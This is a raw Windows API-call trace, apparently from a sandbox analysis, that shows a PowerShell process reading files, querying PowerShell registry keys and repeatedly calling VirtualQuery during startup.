	[0278.793] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.794] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.795] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.795] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.795] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.795] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.796] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.796] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.796] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.796] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.797] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.797] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.797] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.797] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.797] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.798] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.798] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.800] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.800] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.801] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.801] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.801] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.801] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.801] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.802] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.802] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1b4, lpOverlapped=0x0) returned 1
	[0278.802] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x0, lpOverlapped=0x0) returned 1
	[0278.802] CloseHandle (hObject=0x328) returned 1
	[0278.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0278.802] SetErrorMode (uMode=0x1) returned 0x1
	[0278.802] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d460 | out: lpFileInformation=0x12d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0278.803] SetErrorMode (uMode=0x1) returned 0x1
	[0278.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0278.803] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d548 | out: phkResult=0x12d548*=0x328) returned 0x0
	[0278.803] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d4cc, lpData=0x0, lpcbData=0x12d4c8*=0x0 | out: lpType=0x12d4cc*=0x1, lpData=0x0, lpcbData=0x12d4c8*=0x56) returned 0x0
	[0278.803] CoTaskMemAlloc (cb=0x5a) returned 0x2ec1a0
	[0278.803] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d49c, lpData=0x2ec1a0, lpcbData=0x12d498*=0x56 | out: lpType=0x12d49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d498*=0x56) returned 0x0
	[0278.803] CoTaskMemFree (pv=0x2ec1a0) 
	[0278.803] RegCloseKey (hKey=0x328) returned 0x0
	[0278.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0278.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0280.409] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.961] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.962] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.963] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.964] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.965] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.965] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.967] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.976] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.976] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.976] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.976] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.976] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.976] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.977] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.977] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.983] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.988] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.988] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.989] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.989] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.989] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.990] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.990] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.990] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.990] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.991] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.991] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.991] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0280.991] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.475] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.477] VirtualQuery (in: lpAddress=0x12c240, lpBuffer=0x12d100, dwLength=0x30 | out: lpBuffer=0x12d100*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.477] VirtualQuery (in: lpAddress=0x12c240, lpBuffer=0x12d100, dwLength=0x30 | out: lpBuffer=0x12d100*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.477] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.478] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.503] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.503] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.504] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0282.307] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0282.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0282.308] CoTaskMemFree (pv=0x389720) 
	[0282.309] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0282.312] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0282.313] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0282.313] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0282.313] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0282.313] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0282.314] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0282.314] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0282.315] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0282.316] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6e8 | out: phkResult=0x12d6e8*=0x1d0) returned 0x0
	[0282.316] RegQueryValueExW (in: hKey=0x1d0, lpValueName="path", lpReserved=0x0, lpType=0x12d6fc, lpData=0x0, lpcbData=0x12d6f8*=0x0 | out: lpType=0x12d6fc*=0x1, lpData=0x0, lpcbData=0x12d6f8*=0x74) returned 0x0
	[0282.316] RegQueryValueExW (in: hKey=0x1d0, lpValueName="path", lpReserved=0x0, lpType=0x12d66c, lpData=0x0, lpcbData=0x12d668*=0x0 | out: lpType=0x12d66c*=0x1, lpData=0x0, lpcbData=0x12d668*=0x74) returned 0x0
	[0282.316] CoTaskMemAlloc (cb=0x78) returned 0x31a330
	[0282.316] RegQueryValueExW (in: hKey=0x1d0, lpValueName="path", lpReserved=0x0, lpType=0x12d63c, lpData=0x31a330, lpcbData=0x12d638*=0x74 | out: lpType=0x12d63c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d638*=0x74) returned 0x0
	[0282.316] CoTaskMemFree (pv=0x31a330) 
	[0282.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0282.316] SetErrorMode (uMode=0x1) returned 0x1
